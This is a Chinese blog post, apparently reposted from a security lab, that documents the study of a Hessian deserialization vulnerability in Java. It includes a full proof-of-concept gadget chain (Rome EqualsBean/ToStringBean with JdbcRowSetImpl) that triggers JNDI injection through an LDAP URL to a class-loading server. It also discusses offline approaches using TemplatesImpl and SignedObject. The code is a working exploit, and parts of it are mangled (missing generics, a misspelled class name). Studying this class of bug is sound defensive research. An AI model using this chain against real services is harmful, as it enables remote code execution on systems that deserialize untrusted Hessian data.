Hessian反序列化漏洞学习记录

最新推荐文章于 2024-05-11 14:13:31 发布
最新推荐文章于 2024-05-11 14:13:31 发布
阅读量855 收藏
点赞数
分类专栏: 漏洞分析及复现 文章标签: 学习 网络 java
原文链接:http://moonflower.fun/index.php/2022/05/28/336/
版权

►►►

出品|博客(ID:moon_flower)
声明

以下内容,来自先知社区的u21h2作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

►►►

环境搭建

关于RPC:

Remote Procedure Call Protocol,远程过程调用协议,和RMI(Remote Method Invocation,远程方法调用)类似,都能通过网络调用远程服务,但RPC是以标准的二进制格式来定义请求的信息,可用实现跨语言和跨操作系统通讯。

通讯过程:

  1. 客户端发起请求,并按照RPC协议格式填充信息

  2. 填充完毕后将二进制格式文件转化为流,通过传输协议进行传输

  3. 服务端接收到流后,将其转换为二进制格式文件,并按照RPC协议格式获取请求信息并进行处理

  4. 处理完毕后将结果按照RPC协议格式写入二进制格式文件中并返回

maven添加扩展:

            <dependency>
        <groupId>com.caucho</groupId>
        <artifactId>hessian</artifactId>
        <version>4.0.63</version>
    </dependency>

►►►

漏洞分析

漏洞的触发点:HessianInput#readObject,由于Hessian会加你个序列化的结果处理成一个Map,所有序列化的结果的bytes的第一个 byte总为M(77)。

图片接着调用readMap进行进一步解析,接着进入getDeserializer,然后创建一个 HashMap作为缓存,先将要反序列化的类作为key放入HashMap中
图片这里会调用HashMap.put方法,结合之前分析过的CC链,后续调用的hash函数能触发任意类的hashcode方法。那么只需要找一条入口为hashcode的反序列化链即可。

RomeXBean
Resin
SpringPartiallyComparableAdvisorHolder
SpringAbstractBeanFactoryPointcutAdvisor

打 Rome

poc:

package moonflower.hessian; 
import com.caucho.hessian.io.HessianInput; 
import com.caucho.hessian.io.HessianOutput; 
import com.caucho.hessian.io.ObjectNameDeserializer; 
import com.rometools.rome.feed.impl.EqualsBean; 
import com.rometools.rome.feed.impl.ToStringBean; 
import com.sun.rowset.JdbcRowSetImpl; 
import java.io.ByteArrayInputStream; 
import java.io.ByteArrayOutputStream; 
import java.io.IOException; 
import java.io.Serializable;
 import java.lang.reflect.Array; 
 import java.lang.reflect.Constructor; 
 import java.lang.reflect.Field; 
 import java.util.HashMap;
 public class Hessian_Rome {     
 public staticbyte[] serialize(T o) throws IOException {         
  ByteArrayOutputStream bao = new ByteArrayOutputStream();       
 HessianOutput output = new HessianOutput(bao);      
output.writeObject(o);       
  System.out.println(bao.toString());      
 return bao.toByteArray();    
              }    
        public staticT deserialize(byte[] bytes) throws IOException {         ByteArrayInputStream bai = new ByteArrayInputStream(bytes);         HessianInput input = new HessianInput(bai);         Object o = input.readObject();         return (T) o;     }     public static void setValue(Object obj, String name, Object value) throws Exception {         Field field = obj.getClass().getDeclaredField(name);         field.setAccessible(true);         field.set(obj, value);     }     public static Object getValue(Object obj, String name) throws Exception {         Field field = obj.getClass().getDeclaredField(name);         field.setAccessible(true);         return field.get(obj);     }     public static void main(String[] args) throws Exception {         JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();         String url = "ldap://localhost:9999/EXP";         jdbcRowSet.setDataSourceName(url);         ToStringBean toStringBean = new ToStringBean(JdbcRowSetImpl.class,jdbcRowSet);         EqualsBean equalsBean = new EqualsBean(ToStringBean.class,toStringBean);         HashMap hashMap = makeMap(equalsBean, "1");         byte[] s = serialize(hashMap);         System.out.println(s);         System.out.println((HashMap)deserialize(s));     }     //

用反射动态创建数组,防止在狗仔gadget的时候触发 put 方法导致RCE。

public static HashMapmakeMap (Object v1, Object v2) throws Exception {         
HashMaps = new HashMap<>();         
setValue(s, "size", 2);         
Class nodeC;        
 try {            
  nodeC = Class.forName("java.until.HashMap$Node");      
     }         
     catch (ClassNotFoundException e) {         
         nodeC = Class.forName("java.util.HashMap$Entry");   
               }         
               Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);         
               nodeCons.setAccessible(true);        
               Object tbl = Array.newInstance(nodeC, 2);        
               Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));        
               Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));         
setValue(s, "table", tbl);         return s;     } }

Rome的rce过程:
图片进入触发点,接着调用EqualBean的hashcode方法
图片接着会触发ToStringBean的toString方法(这里就有很多其它延申了,比如可以接一个 CC5)
图片接着进入JdbcRowSetImp的toString 方法,在其中会调用JdbcRowSetImp的 getter
图片

图片

当调用到getDatabaseMetaData的时候,会进入connect方法,进而调用 lookup触发jndi注入。

图片

图片

►►►

不出网的失败打法

参考 CC2,在ToStringBean.toString() 的地方能调用任意的getter,正常的思路是可以利用TemplatesImpl的getOutputProperties方法实现任意类加载,但这个思路在Hessian反序列化中是不行的!!!

先回顾一下正常的CC2,从Transformer开始,跟进到getTransletInstance中,并在其中实例化恶意class。
图片顺着调用栈向上找,恶意class的生成在defineTransl-etClasses中实现:
图片注意这里的_tfactory是传入的TransformerFactor-yImpl(因为默认为null,不传的话会直接触发异常)。

如果在Hessian反序列化中用TemplatesImpl代替ROME中的jndi注入,会在toString中调用TemplatesImpl的getOutputProperties,但这里重点关注传入的关键参数

图片跟进具体的调用
图片同样跟进到 defineTransletClasses 中,但这里的 _tfactory 却为空
图片找一下_tfactory的定义发现_tfactory是用transient修饰的,序列化对象的时候,这个属性就不会序列化到指定的目的地中,所以最后为空,也合情合理。
图片但CC2为什么可以?原因是TemplatesImpl的readObject的最后一句直接new了一个_tfactory(这也是为什么虽然王传的大部分CC2都要给 _tfactory传参但不传也行的原因),而直接拼Rome的链子不会用到原生的readObject,所以也不会实例化这个_tfactory。

图片

不出网的成功打法

利用了java.security.SignedObject ,直接打二次反序列化即可。

图片

►►►

参考

  • https://goodapple.top/archives/1193

  • https://f002.backblazeb2.com/file/sec-news-

  • backup/files/writeup/blog.csdn.net/_u011721501_article_details_79443598/index.html

  • https://su18.org/post/hessian/

欢迎关注长白山攻防实验室微信公众号
定期更新优质技术文字分享

长白山攻防实验室
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hessian 反序列化RCE漏洞复现
0xSec
12-29 2352
Hessian是二进制的web service协议,官方对Java、Flash/Flex、Python、C++、.NET C#等多种语言都进行了实现。Hessian和Axis、XFire都能实现web service方式的远程方法调用,区别是Hessian是二进制协议,Axis、XFire则是SOAP协议,所以从性能上说Hessian远优于后两者,并且HessianJAVA使用方法非常简单。它使用Java语言接口定义了远程对象,集合了序列化/反序列化和RMI功能。Hessian是一个轻量级的RPC框架。
hessian学习基础篇——序列化和反序列化
05-26
NULL 博文链接:https://qinghua0208.iteye.com/blog/493516
Nacos漏洞总结复现
最新发布
喜欢Python编程的程序员柚柚呀
05-11 1344
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
Java Hessian反序列化漏洞
Keepb1ue的博客
01-10 4315
Java Hessian反序列化漏洞复现
Javaweb安全——Hessian 反序列化
weixin_43610673的博客
02-03 1877
Hessian类似于RMI也是一种RPC(Remote Produce Call)的实现。基于HTTP协议,使用二进制消息进行客户端和服务器端交互。Hessian 自行定义了一套自己的储存和还原数据的机制。对 8 种基础数据类型、3 种递归类型、ref 引用以及 Hessian 2.0 中的内部引用映射进行了相关定义。这样的设计使得 Hassian 可以进行跨语言跨平台的调用。
Hessian 反序列化及XXL-JOB
zkaqlaoniao的博客
11-29 1041
我们经常在CTF里见到Java反序列化的题,而如何从CTF过渡到实战中是一个坎儿,今天就说一次在实战中遇到的不出网Hessian反序列化问题。文章所有内容无敏感信息,均为本地环境,只做思路分享。
Nacos 反序列化漏洞初步探针
kkdgyb6的博客
06-12 3219
方法首先创建一个ByteArrayOutputStream对象和一个Hessian2Output对象,将ByteArrayOutputStream对象传递给Hessian2Output的构造函数进行初始化,然后通过调用setSerializerFactory方法设置序列化工厂,之后调用writeObject方法将对象写入输出流中,并通过close方法关闭Hessian2Output对象,最后返回ByteArrayOutputStream对象中的字节数组。例如,攻击者可以将类路径或类名随意修改,借此利用。
dubbo-exp:Dubbo反序列化一键快速攻击测试工具,支持dubbo协议和http协议,支持hessian反序列化java原生反序列化
05-09
工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果使用者负责Dubbo反序列化测试工具使用帮助usage: java -jar exp.jar [OPTION]-h --help 帮助信息-l --list 输出所有gadget信息-g --gadget ...
Hessian 2.0序列化协议规范.docx
09-14
Hessian 2.0序列化协议规范》 在分布式计算和网络通信中,数据的序列化和反序列化是至关重要的环节。Hessian 2.0是一种高效的二进制序列化协议,它旨在减少网络传输的数据量,提高数据交换的效率。本文将详细介绍...
Hessian学习笔记
09-14
Hessian学习笔记 Hessian是一种基于Binary-RPC协议实现的远程通讯library,由Caucho提供。下面是Hessian学习笔记: 一、简介 Hessian是基于Binary-RPC协议实现的远程通讯library,用于实现远程过程调用(RPC)...
浅谈Java序列化和hessian序列化的差异
08-29
Java序列化和Hessian序列化的差异 Java序列化和Hessian序列化是两种常用的序列化机制,它们都可以将对象转换为字节流,以便在网络上传输。但是,两者之间有着很大的差异,今天我们就来比较一下它们的实现机制和特点...
Java安全』反序列化-浅析Hessian反序列化POP链
Ho1aAs‘s Blog
07-22 1131
# 反序列化漏洞原理 在反序列化时,会通过标志位判断对象的类型,然后调用对应类的反序列化器 对应方法在`SerializerFactory.loadDeserializer()` 具体会**调用到Map的put方法**写入键值对 **对于Map类:会调用反序列化器的readMap方法进行反序列化操作**,默认反序列化出来的是HashMap类 而**HashMap的put方法就会调用键自身的hashCode方法来判断是否有重复**,进而就造成了漏洞风险,这里不再赘述 **对于TreeMap还有equals.
附录(Nacos 反序列化漏洞初步探针)
kkdgyb6的博客
06-12 891
在deserialize方法中,我们通过指定泛型类型T来确定反序列化后的具体类型,并将反序列化得到的对象强制转换为T类型,并返回该对象。需要注意的是,在调用deserialize方法时,由于我们指定了泛型类型T,编译器会根据T的具体类型来推断反序列化后的对象类型,并生成合适的代码进行类型转换。因此,通过定义一个重载的deserialize方法,我们可以在不使用泛型参数的情况下指定反序列化后的具体类型,并且可以使用Type类型表示更多类型的对象,从而提高代码的灵活性和可扩展性。
xxl-job入门
罗小爬的技术宝书
11-14 1086
目录总体架构启动调度中心客户端集成执行器maven依赖集成Xxl-job配置配置执行器组件BEAN模式BEAN模式(类形式)- 实现IJobHandler[推荐]BEAN模式(方法形式)- 为Job方法添加注解@XxlJob新建BEAN模式任务GLUE模式 参考: https://www.xuxueli.com/xxl-job 总体架构 调度模块(调度中心): 负责管理调度信息,按照调度配置发出调度请求,自身不承担业务代码。调度系统与任务解耦,提高了系统可用性和稳定性,同时调度系统性能不再受限于任务模块;
Java序列化Serializable初识(2)——与SignedObject结合使用
柴泽建的博客
06-22 681
上一篇文章让我们简单理解了Java中序列化的知识,以及我们Serializable的使用过程。 今天介绍Serializable+SignedObject来应对数据传输中被篡改的情况。即认证过程。
2023巅峰极客比赛web复现
weixin_63231007的博客
08-07 394
过滤了if,用case when绕过,sleep、benchmark、rpad也过滤了,用笛卡尔积延时,通常是用count(*),这里count被过滤了,其他函数也可以,这里用sum。
【严重】Nacos 集群Raft反序列化漏洞
murphysec的博客
06-07 3727
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。产品可以极低成本的和现有开发流程中的各种工具一键打通,包括 IDE、Gitlab、Bitbucket、Jenkins、Harbor、Nexus 等数十种工具无缝集成。Nacos是一个用于动态服务发现和配置以及服务管理的平台。
Nacos集群Raft反序列化漏洞-修复
epmgy315的博客
06-08 3276
近日,奇安信CERT监测到Nacos 集群Raft反序列化漏洞(QVD-2023-13065),在Nacos集群处理部分Jraft请求时,攻击者可以无限制使用hessian进行反序列化利用,最终实现代码执行。鉴于该漏洞仅影响集群间通信端口 7848(默认配置下),若部署时已进行限制或未暴露则风险可控,建议客户做好自查及防护。 目前官方已发布安全修复更新,受影响用户可以升级到Nacos 1.4....
Apache Dubbo Hession反序列化漏洞(CVE-2022-39198)
huofuman960209的博客
11-07 2160
Apache Dubbo组件存在Hession反序列化漏洞,该漏洞是由于Dubbo hessian-lite 3.2.12及之前版本中存在反序列化漏洞,利用此漏洞可在目标系统上执行恶意代码,最终获取服务器最高权限,漏洞编号:CVE-2022-39198,漏洞威胁等级:高危。
hessian反序列化漏洞
01-06
Hessian是一种基于Java的轻量级的远程调用协议,用于实现不同语言之间的通信。而Hessian反序列化漏洞是指在Hessian协议中,由于不充分的输入验证或者对用户输入数据的不完全信任,导致攻击者可以利用恶意构造的序列化数据,执行远程代码。这种漏洞在实际应用中可能会导致严重的安全问题,例如远程命令执行、拒绝服务等。 Hessian反序列化漏洞的出现与序列化和反序列化机制有关。在Java中,对象可以被序列化成字节流,然后通过网络传输到另一个系统或者磁盘中,之后再进行反序列化还原成原始对象。如果反序列化过程中未对字节流进行充分的验证,恶意用户可以构造特定的字节流,以实现执行恶意代码的目的。 为了防范Hessian反序列化漏洞,开发人员应该对用户输入进行完全的信任验证,采取严格的输入验证,禁止远程代码执行。另外,可以采用安全的序列化与反序列化机制,例如对序列化的数据进行数字签名或者加密,以确保数据的完整性和安全性。 在应对Hessian反序列化漏洞时,开发团队应该及时更新相关的安全补丁,对可能存在漏洞的系统进行全面审查,修复潜在的安全问题,同时也应做好监控和日志记录工作,及时发现并应对可能的攻击行为。保护系统安全需要全员的努力,包括开发人员、安全专家和运维团队,共同为系统的安全稳定保驾护航。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值